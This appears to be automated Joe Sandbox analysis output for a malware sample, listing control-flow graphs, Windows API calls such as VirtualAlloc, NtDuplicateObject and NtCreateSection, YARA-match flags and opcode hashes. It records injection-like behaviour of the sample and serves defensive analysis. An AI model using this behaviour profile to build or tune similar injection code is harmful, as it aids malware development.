                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_610000_ddhfdfu.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID: cess$kernel32.dll
                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                  • Instruction ID: b40402b49297019ac0359b46df886006c9cefe6b746cbecd0bbf5e598aecbc36
                                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                  • Instruction Fuzzy Hash: 24526874A012299FDB64CF68C985BA8BBB1BF09304F1480D9E54DAB351DB70AAC5DF14

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 313 551db7-551dd0 314 551dd2-551dd4 313->314 315 551dd6 314->315 316 551ddb-551de7 CreateToolhelp32Snapshot 314->316 315->316 317 551df7-551e04 Module32First 316->317 318 551de9-551def 316->318 319 551e06-551e07 call 551a76 317->319 320 551e0d-551e15 317->320 318->317 323 551df1-551df5 318->323 324 551e0c 319->324 323->314 323->317 324->320
                                                                                                  APIs
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00551DDF
                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 00551DFF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2473769295.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_540000_ddhfdfu.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                  • String ID:
                                                                                                  • API String ID: 3833638111-0
                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                  • Instruction ID: f1c57272fabd42fd63d265e4ac91a30392eb573b06218172ef30a9a99234f6b8
                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                  • Instruction Fuzzy Hash: ABF0F636100B116BD7203BF5A89DBAE7EFCBF49326F10052AEA42910C0CB70ED494664

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 326 610e0f-610e24 SetErrorMode * 2 327 610e26 326->327 328 610e2b-610e2c 326->328 327->328
                                                                                                  APIs
                                                                                                  • SetErrorMode.KERNELBASE(00000400,?,?,00610223,?,?), ref: 00610E19
                                                                                                  • SetErrorMode.KERNELBASE(00000000,?,?,00610223,?,?), ref: 00610E1E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2474059930.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_610000_ddhfdfu.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorMode
                                                                                                  • String ID:
                                                                                                  • API String ID: 2340568224-0
                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                  • Instruction ID: 649faff877baa90af5d0f76c5993c87f03ba0bdede3cca897dfd7d7f314a1141
                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                  • Instruction Fuzzy Hash: FFD0123114512877DB002A95DC09BCD7B1CDF05B62F048411FB0DD9180C7B0998046E5

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 329 40c3b1-40c3d3 HeapCreate 330 40c3d5-40c3d6 329->330 331 40c3d7-40c3e0 329->331
                                                                                                  APIs
                                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040C3C6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2473437349.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_40b000_ddhfdfu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 10892065-0
                                                                                                  • Opcode ID: 71222e89fbad33bf90c2f892ffc061b9edb59bf11242c618400469350826e5ca
                                                                                                  • Instruction ID: 94244e611b537c2edf94d5cca879c25ed5d218993ee5c4132b7c1dd7bdc8514f
                                                                                                  • Opcode Fuzzy Hash: 71222e89fbad33bf90c2f892ffc061b9edb59bf11242c618400469350826e5ca
                                                                                                  • Instruction Fuzzy Hash: 61D05E36590349AADB009FB27C097623BDCA385396F00C436B91CC6590F675C6809A08

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 554 401891-4018c1 561 4018d2 554->561 562 4018c9-4018f7 call 40113b Sleep call 4013bf 554->562 561->562 568 401906-40194c call 40113b 562->568 569 4018f9-401901 call 4014b5 562->569 569->568
                                                                                                  APIs
                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                    • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                    • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2473410424.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_400000_ddhfdfu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 4152845823-0
                                                                                                  • Opcode ID: 6c70d353b433dda2f53fd46e2b53eb18a00404936ca24d3f60717acb78d32f73
                                                                                                  • Instruction ID: 625976beb622557468fde4da7c406050b614696d38d370b0d4d52ea32007e278
                                                                                                  • Opcode Fuzzy Hash: 6c70d353b433dda2f53fd46e2b53eb18a00404936ca24d3f60717acb78d32f73
                                                                                                  • Instruction Fuzzy Hash: 2C0192B260C204EBEB002991CC91EBA32299B04350F308133B603790F1D57C8753B36F

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 583 4018a9-4018c1 590 4018d2 583->590 591 4018c9-4018f7 call 40113b Sleep call 4013bf 583->591 590->591 597 401906-40194c call 40113b 591->597 598 4018f9-401901 call 4014b5 591->598 598->597
                                                                                                  APIs
                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                    • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                    • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2473410424.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_400000_ddhfdfu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 4152845823-0
                                                                                                  • Opcode ID: a0416c7ea6c8b2beaa64009cd037ce3695af2c8d86f7782f0dc7d3fc67dd3c49
                                                                                                  • Instruction ID: 01e10882b1c060c9bcf7afaa20a424b8b06e3eaca9db3e31c9d827ddeb5dfa52
                                                                                                  • Opcode Fuzzy Hash: a0416c7ea6c8b2beaa64009cd037ce3695af2c8d86f7782f0dc7d3fc67dd3c49
                                                                                                  • Instruction Fuzzy Hash: 620178B260C204EBEB042A91CC91EBE2225AB08320F308133B603790F1D67C8753B72F
                                                                                                  APIs
                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                    • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                    • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2473410424.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_400000_ddhfdfu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 4152845823-0
                                                                                                  • Opcode ID: 6b9a7ba5e763362e57e967b3ef273788d2906451f38bbd38aba7de38a4ba4a16
                                                                                                  • Instruction ID: 091d8ab5f34d30388949969244c388a12b20eca364eb9837eec97541f3976fe9
                                                                                                  • Opcode Fuzzy Hash: 6b9a7ba5e763362e57e967b3ef273788d2906451f38bbd38aba7de38a4ba4a16
                                                                                                  • Instruction Fuzzy Hash: 46015AB360C244EBEB016A90C8A1EAA37659B48310F308577B643790F1D67C8753A72F
                                                                                                  APIs
                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                    • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                    • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2473410424.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_400000_ddhfdfu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 4152845823-0
                                                                                                  • Opcode ID: b76e6f8ea108e6f900b2be892df91fc6f607bea987df0946b9f50da5a95319bc
                                                                                                  • Instruction ID: 35dd9e0e0d775fbf54de8accc2db9d3c4b904cb042cfc7da377ce8c3fe766ee0
                                                                                                  • Opcode Fuzzy Hash: b76e6f8ea108e6f900b2be892df91fc6f607bea987df0946b9f50da5a95319bc
                                                                                                  • Instruction Fuzzy Hash: 5501A2B6208244EBDB015AA4CD52AEE37259B04320F244177FA13BA0F1DA7CC653E76F
                                                                                                  APIs
                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00551AC7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2473769295.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_540000_ddhfdfu.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                  • Instruction ID: a86be49f6bfa65ad5df62968c35ae2b0e40302fb1c4c0450093ea44e4d562850
                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                  • Instruction Fuzzy Hash: 5C112B79A00208EFDB01DF98C999E98BFF5AF08351F058095F9489B362D771EA90DB84
                                                                                                  APIs
                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                    • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                    • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2473410424.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_400000_ddhfdfu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 4152845823-0
                                                                                                  • Opcode ID: b859de65e3e4eca09ea0fa0fd0a149a7b7b601be189d05055e302c384b2899de
                                                                                                  • Instruction ID: 66a051fc3b1640109372302853407978bf892c336f6e5febd052736601f380b8
                                                                                                  • Opcode Fuzzy Hash: b859de65e3e4eca09ea0fa0fd0a149a7b7b601be189d05055e302c384b2899de
                                                                                                  • Instruction Fuzzy Hash: DBF04FB6208244EBDB006AD1CC51EAE33699B49364F304173B613790F5D67C8653E72F
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2473437349.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_40b000_ddhfdfu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___getlocaleinfo
                                                                                                  • String ID:
                                                                                                  • API String ID: 1937885557-0
                                                                                                  • Opcode ID: 08a5706dd36f95cb33eb1fd19b6180d9160690d7207ff98e0d0a3bb732afdc1e
                                                                                                  • Instruction ID: 88e971658578b68865164239707bd76bcf5248923822aacfc0123a1835a67747
                                                                                                  • Opcode Fuzzy Hash: 08a5706dd36f95cb33eb1fd19b6180d9160690d7207ff98e0d0a3bb732afdc1e
                                                                                                  • Instruction Fuzzy Hash: 17E101B390020DBEEF11DAE2CC85EFF77BDEB5474CF00092AB215D2050EA78AA459764
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2473437349.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_40b000_ddhfdfu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _memset$___ansicp___convertcp_malloc
                                                                                                  • String ID: 1BA
                                                                                                  • API String ID: 182381717-427559476
                                                                                                  • Opcode ID: 1a9c0c095cd4ebbc7412376d92f8ab6fbe77295eb3f3c08220bdd1022898e340
                                                                                                  • Instruction ID: c477a1a75e98c9aee6368b68bfaa6e784f79f85bafb577a3b4888ecfb962d632
                                                                                                  • Opcode Fuzzy Hash: 1a9c0c095cd4ebbc7412376d92f8ab6fbe77295eb3f3c08220bdd1022898e340
                                                                                                  • Instruction Fuzzy Hash: 7051BE7550011AFFDB109FA5DC859EF3BA9EB98354B20453AFA04D7260D738CDE18B98
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2473437349.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_40b000_ddhfdfu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __lock$__crt_waiting_on_module_handle
                                                                                                  • String ID: x$@
                                                                                                  • API String ID: 946058739-580337868
                                                                                                  • Opcode ID: fc4670a47f3632b01b16caf735d8ff3ab22c7296ea4dd8459bfb17ea7d2a7ba1
                                                                                                  • Instruction ID: f8475ee44d53d994f5b99ace5135e8e36cb9c777021c500f84fce444b4195f36
                                                                                                  • Opcode Fuzzy Hash: fc4670a47f3632b01b16caf735d8ff3ab22c7296ea4dd8459bfb17ea7d2a7ba1
                                                                                                  • Instruction Fuzzy Hash: 7A119071940741EEE720AF769945B4ABBE0AF04318F10853FE4A9B72E1CB78A945CF5C
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2473437349.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_40b000_ddhfdfu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                  • String ID:
                                                                                                  • API String ID: 3016257755-0
                                                                                                  • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                  • Instruction ID: 81a52edbc7f04b0b3beaf306ef0248834585fa557240606b8da63e4de76e0855
                                                                                                  • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                  • Instruction Fuzzy Hash: 5C117E3640054EBBCF135E84CC018EE3F22BB19354B18845AFE1859131CB3AC9B2EB89